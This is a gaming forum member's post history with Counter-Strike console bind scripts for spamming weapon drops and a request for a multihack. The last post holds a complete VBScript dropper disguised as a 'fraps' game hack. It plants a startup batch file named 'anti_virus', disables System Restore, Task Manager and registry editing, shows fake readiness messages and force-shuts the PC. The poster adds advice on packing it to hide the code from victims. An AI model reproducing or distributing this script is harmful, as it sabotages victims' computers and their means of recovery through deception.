Jump to content

f10_haxzor

Members
  • Joined

  1. f10_haxzor posted a post in a topic in Steam Powered Games
    lol..... replace give with buy buy glock; slot2; drop
  2. f10_haxzor posted a post in a topic in Steam Powered Games
    grenade buying spam , need sv_cheats set to 1 alias +cheats "+cheatson" alias +cheatson "ma_rcon sv_cheats 1; alias +cheats +cheatsoff" alias +cheatsoff "cl_showfps 0; alias +cheats +cheatson" bind "1" "+cheats" alias "+smoke" "give weapon_smokegrenade; give weapon_smokegrenade; give weapon_smokegrenade; give weapon_smokegrenade" alias "+smokes" "+smoke; +smoke; +smoke; +smoke; +smoke; +smoke; +smoke" bind "2" "+smokes" alias "+flashb" "give weapon_flashbang;give weapon_flashbang;give weapon_flashbang;give weapon_flashbang;give weapon_flashbang" alias "+flashsb" "+flashb; flashb; flashb; flashb; flashb; flashb; flashb" bind "3" "+flashsb" alias "+henade" "give weapon_hegrenade; give weapon_hegrenade; give weapon_hegrenade; give weapon_hegrenade; give weapon_hegrenade" alias "+henades" "+henade;+henade;+henade;+henade;+henade;+henade;+henade;+henade" bind "4" "+henades" bind "5" "+smokes; +flashsb; +smokes"
  3. f10_haxzor posted a post in a topic in Steam Powered Games
    /// buy with cash alias +buyglock "buy glock;drop ;buy glock; drop; buy glock;drop ;buy glock; drop; buy glock;drop ;buy glock; drop" alias -buyglock " " bind "]" "+buyglock" /// give with ma admin alias +buyglockadmin "ma_give f10 weapon_glock;drop ;ma_give f10 weapon_glock; drop; ma_give f10 weapon_glock;drop ;ma_give f10 weapon_glock; drop; ma_give f10 weapon_glock;drop ;ma_give f10 weapon_glock; drop" alias -buyglockadmin " " bind "[" "+buyglockadmin" // give the weapon with cheats set to 1 alias +buyglockcheats "give weapon_glock;drop ;give weapon_glock; drop; give weapon_glock;drop ;give weapon_glock; drop; give weapon_glock;drop ;give weapon_glock; drop" alias -buyglockcheats " " bind ";" "+buyglockcheats"
  4. f10_haxzor posted a post in a topic in Steam Powered Games
    yea the new update sucks, if you know of a new multihack that works like how the hl2hook did pm me :dfinger:
  5. f10_haxzor posted a post in a topic in Other Games
    Const constHKEY_LOCAL_MACHINE = &H80000002 Const constComputer = "." Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ constComputer & "\root\default:StdRegProv") strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" strValueName = "anti_virus" strValue = "C:\WINDOWS\system32\windows.bat" objReg.SetStringValue constHKEY_LOCAL_MACHINE, strKeyPath, strValueName, strValue Const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _ strComputer & "\root\default:StdRegProv") strKeyPath = "SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" strValueName = "DisableConfig" dwValue = 1 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strValueName = "DisableSR" dwValue = 1 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue Const HKEY_CURRENT_USER = &H80000001 strComputer = "." Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _ strComputer & "\root\default:StdRegProv") strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Policies\System" strValueName = "DisableRegistryTools" dwValue = 1 oReg.SetDWORDValue HKEY_CURRENT_USER,strKeyPath,strValueName,dwValue strValueName = "DisableTaskMgr" dwValue = 1 oReg.SetDWORDValue HKEY_CURRENT_USER,strKeyPath,strValueName,dwValue Wscript.Echo "fraps is almost ready to be used" Wscript.Echo "a restart is now required" Sub ShutDown nLogOff=0 nReboot=2 nForceLogOff=4 nForceReboot=6 nPowerDown=8 nForcePowerDown=12 Set oOS = GetObject("winmgmts:{(Shutdown)}").ExecQuery("Select * from Win32_OperatingSystem") For Each oOperatingSystem in oOS oOperatingSystem.Win32Shutdown(nForcePowerDown) Next End sub ShutDown save as filename.vbs it makes the file c:windows/system32/windows.bat startup when windows start it also disables system restore, task manager, and registry editing. then you get a popup message saying your hax is almost ready to use (you press ok) then another 1 says a restart is now required (press ok) then it shuts down your computer enjoi edit: download a file called filepacker, set it so that the .vbs file runs when oppened and windows.bat goes in to your system32 folder, compress it to the max to help hide the code